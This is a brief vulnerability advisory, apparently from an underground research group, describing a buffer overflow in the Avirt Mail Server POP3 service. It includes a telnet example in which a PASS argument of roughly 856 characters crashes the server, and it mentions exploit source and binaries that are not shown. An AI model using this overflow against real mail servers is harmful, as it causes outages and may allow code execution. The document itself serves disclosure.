Avirt Mail Server 3.3a or 3.5 remotely exploitable buffer overflow vulnerability
   
Avirt Mail Server 3.3a or 3.5 Avirt Mail Server

Avirt mail Server Remote Exploit For 3.3a or 3.5 D.o.s Binary

Avirt mail Server Remote Exploit For 3.3a or 3.5 D.o.s Source (needs Tasm 5.0)

Problem:

We found a remotely exploitable buffer overflow in the Avirt Mail Server 3.3a and a D.o.S in the version 3.5, (long USER / PASS:)

that may allow an attacker to execute arbitrary code on the target server,

Example:

[cham@guilt cham]$ telnet example.com 110

Trying example.com...

Connected to example.com.

Escape character is '^]'.

+OK aVirt Mail POP3 Server Ready

user itsme

+OK

Pass [buffer]

Where [buffer] is aprox. 856 characters. At his point the server overflows and crashes.

Just a typical buffer overflow

Published by: USSRBACK

u n d e r g r o u n d s e c u r i t y s y s t e m s r e s e a r c h